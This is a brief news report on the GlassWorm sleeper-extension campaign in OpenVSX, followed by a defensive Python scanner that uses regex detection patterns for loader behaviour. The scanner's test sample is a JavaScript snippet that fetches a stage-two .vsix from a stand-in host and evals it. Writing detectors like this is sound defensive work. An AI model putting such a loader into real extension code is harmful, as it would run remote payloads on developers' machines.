The GlassWorm campaign has resurfaced, targeting the OpenVSX ecosystem with 73 "sleeper" extensions. These extensions are benign when first installed but are later turned into malicious loaders through updates, delivering payloads at a later stage. Six have already activated; the rest are considered dormant or suspicious. This marks an evolution in the supply-chain attack, moving from embedding malicious code directly in the extension to using thin loaders that fetch secondary VSIX packages, platform-specific compiled modules, or obfuscated JavaScript at runtime.
Previously, GlassWorm attacks were known for stealing cryptocurrency wallets, developer credentials, access tokens, and SSH keys. Researchers from Socket have identified these new extensions as clones of legitimate listings, designed to trick developers. They recommend that anyone who installed these extensions rotate all secrets and clean their development environment to mitigate potential compromise.
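The "thin loader" shape described above (fetch something at runtime, then write or execute it) can be triaged heuristically across an installed extension set. The following is an added example, not code from the article or from Socket's research: the regexes are generic behavioural heuristics rather than GlassWorm indicators, the extension directory layout is assumed to be the standard `<publisher>.<name>-<version>/package.json` one, and the sample sources are constructed.

```python
import json
import re
from pathlib import Path

# Indicator name -> regex over the extension's JavaScript source (heuristics, not IoCs).
INDICATORS = {
    "network_fetch": re.compile(r"\b(https?\.(get|request)|fetch|axios\.\w+)\s*\("),
    "dynamic_exec": re.compile(r"\b(eval|new Function|vm\.runIn\w+|child_process)\b"),
    "payload_artifact": re.compile(r"\.(vsix|node)['\"]|os\.tmpdir\(\)"),
    "obfuscation": re.compile(r"(?:\\x[0-9a-f]{2}){8,}|_0x[0-9a-f]{4,}|String\.fromCharCode"),
}


def scan_source(src: str) -> dict:
    """Return the indicators hit and a verdict for one JavaScript source."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(src)}
    # A loader must both pull something in and run it; either alone is common in
    # legitimate extensions (telemetry, language-server downloads), so only the pair rates.
    if "network_fetch" in hits and hits & {"dynamic_exec", "payload_artifact"}:
        verdict = "loader-like"
    else:
        verdict = "review" if hits else "clean"
    return {"verdict": verdict, "indicators": sorted(hits)}


def scan_extensions_dir(root: str) -> list:
    """Scan each <root>/<publisher>.<name>-<version>/ whose package.json names
    a "main" script (assumed VS Code layout, e.g. ~/.vscode/extensions)."""
    results = []
    for manifest in Path(root).glob("*/package.json"):
        meta = json.loads(manifest.read_text(encoding="utf-8", errors="replace"))
        entry = manifest.parent / meta.get("main", "extension.js")
        if entry.is_file():
            found = scan_source(entry.read_text(encoding="utf-8", errors="replace"))
            results.append({"extension": manifest.parent.name, **found})
    return results


# Constructed samples (not real extension code): a benign command extension and a
# sleeper-style thin loader that fetches a second-stage .vsix into tmpdir and runs it.
BENIGN_SAMPLE = """const vscode = require('vscode');
exports.activate = (ctx) => ctx.subscriptions.push(vscode.commands.registerCommand(
  'demo.hello', () => vscode.window.showInformationMessage('hello')));
"""
LOADER_SAMPLE = """const https = require('https'), fs = require('fs'), os = require('os');
exports.activate = () => https.get('https://example.invalid/stage2.vsix', (res) => {
  const out = os.tmpdir() + '/stage2.vsix';
  res.pipe(fs.createWriteStream(out)).on('finish', () => eval(fs.readFileSync(out, 'utf8')));
});"""
```

Anything rated "loader-like" deserves a look at its update history and an offline diff of the last few versions; "review" hits are usually legitimate but worth a glance when the publisher is unfamiliar.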